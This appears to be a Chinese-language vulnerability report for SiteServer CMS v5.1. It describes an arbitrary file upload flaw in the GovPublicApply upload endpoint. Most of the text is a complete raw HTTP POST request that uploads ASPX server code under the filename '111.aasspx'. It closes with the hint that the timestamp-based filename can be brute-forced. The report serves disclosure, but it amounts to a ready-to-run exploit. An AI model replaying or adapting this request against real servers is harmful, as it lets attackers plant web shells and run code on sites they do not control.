Description
测试的版本:https://github.com/siteserver/cms/releases/download/siteserver-dev-v5.0.92/siteserver_install.zip
SiteServer:v5.1
测试环境:windows 2012 R2
数据库 sql server 2016
漏洞url:/api/stl/actions/upload/1?type=GovPublicApply
(测试过程中,不需要修改程序任何系统配置)
包体
`POST /api/stl/actions/upload/1?type=GovPublicApply HTTP/1.1
Host: 192.168.39.3:8099
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: /
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
X_Requested_With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------307288271314916491681521187278
Content-Length: 903
Origin: http://192.168.39.3:8099
Connection: close
-----------------------------307288271314916491681521187278
Content-Disposition: form-data; name="id"
WU_FILE_0
-----------------------------307288271314916491681521187278
Content-Disposition: form-data; name="name"
111.png
-----------------------------307288271314916491681521187278
Content-Disposition: form-data; name="type"
image/png
-----------------------------307288271314916491681521187278
Content-Disposition: form-data; name="lastModifiedDate"
2021/10/15 上午10:47:51
-----------------------------307288271314916491681521187278
Content-Disposition: form-data; name="size"
5720
-----------------------------307288271314916491681521187278
Content-Disposition: form-data; name="upfile"; filename="111.aasspx"
Content-Type: image/png
<%@ Page Language="C#"%>
<% Response.Write("hello,world"); %>
-----------------------------307288271314916491681521187278--`
生成的aspx文件名是时间戳相关,黑盒测试需要通过暴力猜解可以获取到。